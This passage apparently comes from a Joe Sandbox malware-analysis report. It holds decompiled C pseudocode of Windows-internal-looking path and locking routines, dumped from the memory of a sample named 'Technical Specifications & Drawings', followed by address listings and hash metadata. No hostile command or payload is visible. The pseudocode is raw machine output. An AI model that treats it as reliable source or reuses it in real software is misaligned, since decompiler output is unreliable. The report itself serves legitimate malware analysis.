																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017C45F8))) {
												case 0:
													_v568 = 0x1781078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L017C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E017EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E017EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E017BEB70(1, 0x18979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E017BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017E95D0();
																			L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E017EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E017EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                  0x017c4128
                                                  0x017c4135
                                                  0x017c413c
                                                  0x017c4141
                                                  0x017c4145
                                                  0x017c4147
                                                  0x017c414e
                                                  0x017c4151
                                                  0x017c4159
                                                  0x017c415c
                                                  0x017c4160
                                                  0x017c4164
                                                  0x017c4168
                                                  0x017c416c
                                                  0x017c417f
                                                  0x017c4181
                                                  0x017c446a
                                                  0x017c446a
                                                  0x017c418c
                                                  0x017c4195
                                                  0x017c4199
                                                  0x017c4432
                                                  0x017c4439
                                                  0x017c443d
                                                  0x017c4442
                                                  0x017c4447
                                                  0x00000000
                                                  0x017c419f
                                                  0x017c41a3
                                                  0x017c41b1
                                                  0x017c41b9
                                                  0x017c41bd
                                                  0x017c45db
                                                  0x017c45db
                                                  0x00000000
                                                  0x017c41c3
                                                  0x017c41c3
                                                  0x017c41ce
                                                  0x017c41d4
                                                  0x0180e138
                                                  0x0180e13e
                                                  0x0180e169
                                                  0x0180e16d
                                                  0x0180e19e
                                                  0x0180e16f
                                                  0x0180e16f
                                                  0x0180e175
                                                  0x0180e179
                                                  0x0180e18f
                                                  0x0180e193
                                                  0x00000000
                                                  0x0180e199
                                                  0x00000000
                                                  0x0180e199
                                                  0x0180e193
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c41da
                                                  0x017c41da
                                                  0x017c41df
                                                  0x017c41e4
                                                  0x017c41ec
                                                  0x017c4203
                                                  0x017c4207
                                                  0x0180e1fd
                                                  0x017c4222
                                                  0x017c4226
                                                  0x0180e1f3
                                                  0x0180e1f3
                                                  0x017c422c
                                                  0x017c422c
                                                  0x017c4233
                                                  0x0180e1ed
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c4239
                                                  0x017c4239
                                                  0x017c4239
                                                  0x017c4239
                                                  0x017c4233
                                                  0x017c4226
                                                  0x017c41ee
                                                  0x017c41ee
                                                  0x017c41f4
                                                  0x017c4575
                                                  0x0180e1b1
                                                  0x0180e1b1
                                                  0x00000000
                                                  0x017c457b
                                                  0x017c457b
                                                  0x017c4582
                                                  0x0180e1ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c4588
                                                  0x017c4588
                                                  0x017c458c
                                                  0x0180e1c4
                                                  0x0180e1c4
                                                  0x00000000
                                                  0x017c4592
                                                  0x017c4592
                                                  0x017c4599
                                                  0x0180e1be
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c459f
                                                  0x017c459f
                                                  0x017c45a3
                                                  0x0180e1d7
                                                  0x0180e1e4
                                                  0x00000000
                                                  0x017c45a9
                                                  0x017c45a9
                                                  0x017c45b0
                                                  0x0180e1d1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c45b6
                                                  0x017c45b6
                                                  0x017c45b6
                                                  0x00000000
                                                  0x017c45b6
                                                  0x017c45b0
                                                  0x017c45a3
                                                  0x017c4599
                                                  0x017c458c
                                                  0x017c4582
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c41f4
                                                  0x017c423e
                                                  0x017c4241
                                                  0x017c45c0
                                                  0x017c45c4
                                                  0x00000000
                                                  0x017c45ca
                                                  0x017c45ca
                                                  0x00000000
                                                  0x0180e207
                                                  0x0180e20f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017c45d1
                                                  0x00000000
                                                  0x00000000
                                                  0x017c45ca
                                                  0x00000000
                                                  0x017c4247
                                                  0x017c4247
                                                  0x017c4247
                                                  0x017c4249
                                                  0x017c4249
                                                  0x017c4249
                                                  0x017c4251
                                                  0x017c4251
                                                  0x017c4257
                                                  0x017c425f
                                                  0x017c426e
                                                  0x017c4270
                                                  0x017c427a
                                                  0x0180e219
                                                  0x0180e219
                                                  0x017c4280
                                                  0x017c4282
                                                  0x017c4456
                                                  0x017c45ea
                                                  0x00000000
                                                  0x017c45f0
                                                  0x0180e223
                                                  0x00000000
                                                  0x0180e223
                                                  0x017c445c
                                                  0x017c445c
                                                  0x00000000
                                                  0x017c445c
                                                  0x00000000
                                                  0x017c4288
                                                  0x017c428c
                                                  0x0180e298
                                                  0x017c4292
                                                  0x017c4292
                                                  0x017c429e
                                                  0x017c42a3
                                                  0x017c42a7
                                                  0x017c42ac
                                                  0x0180e22d
                                                  0x017c42b2
                                                  0x017c42b2
                                                  0x017c42b9
                                                  0x017c42bc
                                                  0x017c42c2
                                                  0x017c42ca
                                                  0x017c42cd
                                                  0x017c42cd
                                                  0x017c42d4
                                                  0x017c433f
                                                  0x017c433f
                                                  0x017c42d6
                                                  0x017c42d6
                                                  0x017c42d9
                                                  0x017c42dd
                                                  0x017c42eb
                                                  0x0180e23a
                                                  0x017c42f1
                                                  0x017c4305
                                                  0x017c430d
                                                  0x017c4315
                                                  0x017c4318
                                                  0x017c431f
                                                  0x017c4322
                                                  0x017c432e
                                                  0x017c433b
                                                  0x017c433b
                                                  0x00000000
                                                  0x017c432e
                                                  0x017c42eb
                                                  0x017c434c
                                                  0x017c434e
                                                  0x017c4352
                                                  0x017c4359
                                                  0x017c435e
                                                  0x017c4361
                                                  0x017c436e
                                                  0x017c438a
                                                  0x017c438e
                                                  0x017c4396
                                                  0x017c439e
                                                  0x017c43a1
                                                  0x017c43ad
                                                  0x017c43bb
                                                  0x017c43bb
                                                  0x017c43ad
                                                  0x017c436e
                                                  0x017c43bf
                                                  0x017c43c5
                                                  0x017c4463
                                                  0x017c4463
                                                  0x017c43ce
                                                  0x017c43d5
                                                  0x017c43d9
                                                  0x017c43df
                                                  0x017c4475
                                                  0x017c4479
                                                  0x017c4491
                                                  0x017c4491
                                                  0x017c4479
                                                  0x017c43e5
                                                  0x017c43eb
                                                  0x017c43f4
                                                  0x017c43f6
                                                  0x017c43f9
                                                  0x017c43fc
                                                  0x017c43ff
                                                  0x017c44e8
                                                  0x017c44ed
                                                  0x017c44f3
                                                  0x0180e247
                                                  0x00000000
                                                  0x017c44f9
                                                  0x017c4504
                                                  0x017c4508
                                                  0x017c450f
                                                  0x0180e269
                                                  0x00000000
                                                  0x017c4515
                                                  0x017c4519
                                                  0x017c4531
                                                  0x017c4534
                                                  0x017c4537
                                                  0x017c453e
                                                  0x017c4541
                                                  0x017c454a
                                                  0x0180e255
                                                  0x0180e255
                                                  0x0180e25b
                                                  0x0180e25e
                                                  0x0180e261
                                                  0x0180e261
                                                  0x017c4555
                                                  0x017c4559
                                                  0x017c455d
                                                  0x0180e26d
                                                  0x0180e270
                                                  0x0180e274
                                                  0x0180e27a
                                                  0x0180e27d
                                                  0x0180e28e
                                                  0x0180e28e
                                                  0x017c4563
                                                  0x017c4563
                                                  0x017c4569
                                                  0x017c4569
                                                  0x00000000
                                                  0x017c455d
                                                  0x017c450f
                                                  0x00000000
                                                  0x017c44f3
                                                  0x017c43ff
                                                  0x017c4405
                                                  0x017c4405
                                                  0x017c4405
                                                  0x017c42ac
                                                  0x017c428c
                                                  0x017c4282
                                                  0x017c4407
                                                  0x017c440d
                                                  0x0180e2af
                                                  0x0180e2af
                                                  0x017c4413
                                                  0x017c4413
                                                  0x00000000
                                                  0x017c41d4
                                                  0x00000000
                                                  0x017c41c3
                                                  0x017c41bd
                                                  0x017c4415
                                                  0x017c4415
                                                  0x017c4416
                                                  0x017c4417
                                                  0x017c4429
                                                  0x017c416e
                                                  0x017c416e
                                                  0x017c4175
                                                  0x017c4498
                                                  0x017c449f
                                                  0x0180e12d
                                                  0x00000000
                                                  0x0180e133
                                                  0x00000000
                                                  0x0180e133
                                                  0x017c44a5
                                                  0x017c44a5
                                                  0x017c44aa
                                                  0x00000000
                                                  0x017c44bb
                                                  0x017c44ca
                                                  0x017c44d6
                                                  0x017c44d7
                                                  0x017c44d8
                                                  0x017c44e3
                                                  0x017c44e3
                                                  0x017c44aa
                                                  0x017c417b
                                                  0x017c417b
                                                  0x017c417b
                                                  0x00000000
                                                  0x017c417b
                                                  0x017c4175
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 902e7f86be874c3e8f209b01eb2ec58c7f8b0096b88c61f7e9846f3f266653d8
                                                  • Instruction ID: c8208ef1cea5cc6043c73c7c3cfa9802f23942f9c5bbbab25d57425407953e47
                                                  • Opcode Fuzzy Hash: 902e7f86be874c3e8f209b01eb2ec58c7f8b0096b88c61f7e9846f3f266653d8
                                                  • Instruction Fuzzy Hash: 42F17D706082118FD725CF18C8A4A7AFBE1FF98B14F14496EF986CB290E734D981CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E017D20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1898714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E017D2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E017D2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E017A58EC(_t240);
									_t221 =  *0x1895cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1895cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E017E4A2C(0x1896e40, 0x17e4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E017C7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1785c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E017DF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E017DF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01827016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L017C2400(_t267 + 0x20);
															}
															L017C2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E017D2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E017C2280(_t134, 0x1898608);
									__eflags =  *0x1896e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E017BFFB0(_t198, _t241, 0x1898608);
										__eflags = _t253;
										if(_t253 != 0) {
											L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1896e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1898608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E017D6B90(_t210,  &_v64);
										_t262 =  *0x1898608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E017DE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E017E97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E017E006A(0x1898608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1898608);
												E017EB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1896904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1896e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E017BFFB0(_t198, _t240, 0x1898608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E017E00C2(0x1898608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                  0x017d20a0
                                                  0x017d20a8
                                                  0x017d20ad
                                                  0x017d20b3
                                                  0x017d20b8
                                                  0x017d20c2
                                                  0x017d20c7
                                                  0x017d20cb
                                                  0x017d20d2
                                                  0x017d2263
                                                  0x017d2266
                                                  0x01815836
                                                  0x01815836
                                                  0x00000000
                                                  0x017d226c
                                                  0x017d226c
                                                  0x017d2270
                                                  0x017d2274
                                                  0x017d20e2
                                                  0x017d20e2
                                                  0x017d20e6
                                                  0x017d20ee
                                                  0x018157dc
                                                  0x018157de
                                                  0x018157ec
                                                  0x018157ec
                                                  0x018157f1
                                                  0x018157f3
                                                  0x018157f8
                                                  0x00000000
                                                  0x018157f8
                                                  0x018157e0
                                                  0x018157e4
                                                  0x018157ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018157ea
                                                  0x017d20f4
                                                  0x017d20f4
                                                  0x017d20f8
                                                  0x017d20f8
                                                  0x017d20fc
                                                  0x017d2100
                                                  0x017d2106
                                                  0x017d2201
                                                  0x017d2206
                                                  0x017d220b
                                                  0x017d220e
                                                  0x017d22a9
                                                  0x017d22ac
                                                  0x00000000
                                                  0x00000000
                                                  0x017d22b2
                                                  0x017d22b5
                                                  0x01815801
                                                  0x01815806
                                                  0x00000000
                                                  0x00000000
                                                  0x01815810
                                                  0x01815815
                                                  0x01815818
                                                  0x00000000
                                                  0x00000000
                                                  0x0181581e
                                                  0x017d22bb
                                                  0x017d22bb
                                                  0x017d2218
                                                  0x017d2218
                                                  0x017d221c
                                                  0x017d2220
                                                  0x017d2222
                                                  0x017d22c2
                                                  0x017d22c4
                                                  0x017d22dc
                                                  0x017d22dc
                                                  0x017d22e1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017d22e7
                                                  0x017d22c8
                                                  0x017d22cd
                                                  0x017d22d3
